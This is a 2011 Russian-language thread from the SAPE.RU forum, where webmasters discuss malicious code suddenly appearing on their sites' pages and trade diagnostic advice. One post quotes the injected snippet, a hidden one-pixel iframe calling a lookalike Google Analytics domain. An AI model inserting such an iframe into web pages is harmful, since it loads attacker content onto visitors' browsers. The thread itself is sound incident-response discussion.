Форум SAPE.RU

Форум SAPE.RU (http://forum.sape.ru/index.php)
-   Ошибки при работе с системой (http://forum.sape.ru/forumdisplay.php?f=14)
-   -   Вирусный код в html-коде всех страниц. Не от САПЫ ли? вред: CG-GOOGLE-ANALYTICS.ru (http://forum.sape.ru/showthread.php?t=73665)

Invasion 30.09.2011 00:53

Похоже новая атака на Сапу.

Салоед 30.09.2011 01:03

Так а делать-то чего? Блин, вычистил сайты, сменил пароли, а код все равно устанавливается на страницах. Чуть ли не в режиме реального времени видно.
При чем заражаются только старые сайты. Сайт добавленный месяц назад - чистый.

Invasion 30.09.2011 01:07

А как в коде это выглядит?

Diamond 30.09.2011 01:08

Дальше разбираться не стал. NOD кричит, поглядеть внутренности не дает.
Рисковать не стал. Заменил пароль, перезалил сайт из архива. Но очень странно всё это.. Уж не утечка ли паролей? Длина пароля была 18 символов.

Салоед 30.09.2011 01:16

Вот такая вот фигня на страничке появляется:

<!--a8998e--><iframe frameborder=0 height=1 width=1 scrolling=no src='http://a.cf-google-analytics.ru/main.php?page=09607b3072273d90'> </iframe><!--/a8998e-->

Diamond 30.09.2011 01:46

Можно ли внепланово обновить ссылочки на статике? Бо послетали, а ждать походу несколько дней, если верить факу.
Цитата:

Кроме этого, предусматривается периодическое (раз в несколько суток) полное обновление всех страниц с блоками ссылок.

sin 30.09.2011 02:32

Я вчера и сегодня проверил файлы собственно ФТП-робота и файлы сайтов, домены которых мне скидывали ранее - ничего подозрительного не нашел. Никаких левых включений в мой код. Мне лично источник проблем не ясен.

Посмотрите, на каких именно страницах есть такой код, только на тех, где последнее время менялись ссылки, или и на других (напр, на тех, на которых не продаются ссылки)? Как этот левый код связан с блоками Сапе? Он в них или за пределами блоков ссылок? Обратите внимание, что бот в штатном режиме может менять только кусок HTML кода с тегами для ссылок, и ничего за его пределами.

ЕСли сбросите домены в личку, посмотрю конкретно по каждому сайту. Так же и с полным обновлением - нужно знать домен.

Цитата:

Сообщение от Diamond (Сообщение 1146721)
Заменил пароль, перезалил сайт из архива. Но очень странно всё это.. Уж не утечка ли паролей?

Ну раз Вы имеете возможность поменять пароль, значит, не все так плохо. Кстати, в целях безопасности его стоит время от времени менять (не забывая про сохранение новых реквизитов в настройках).

Добавлено через 2 минуты
Цитата:

Сообщение от Салоед (Сообщение 1146718)
а код все равно устанавливается на страницах. Чуть ли не в режиме реального времени видно.

Ищите левые скрипты на своем серваке в этом случае.

SergejF 30.09.2011 02:36

Цитата:

Сообщение от Салоед (Сообщение 1146722)
Вот такая вот фигня на страничке появляется:

в каком месте страницы он появляется?

Салоед 30.09.2011 02:48

После тега <body>

sin 30.09.2011 02:50

+ еще такой момент хотелось бы выяснить: пораженные сайты только на платных хостингах (где есть поддержка скриптов), или есть и на хостингах типа народ.ру (где железно скрипты НЕ работают)? Какие хостинги?


Часовой пояс GMT +3, время: 14:34.

Работает на vBulletin® версия 3.8.7.
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Перевод: zCarot
SAPE.RU — система купли-продажи ссылок с главных и внутренних страниц сайтов.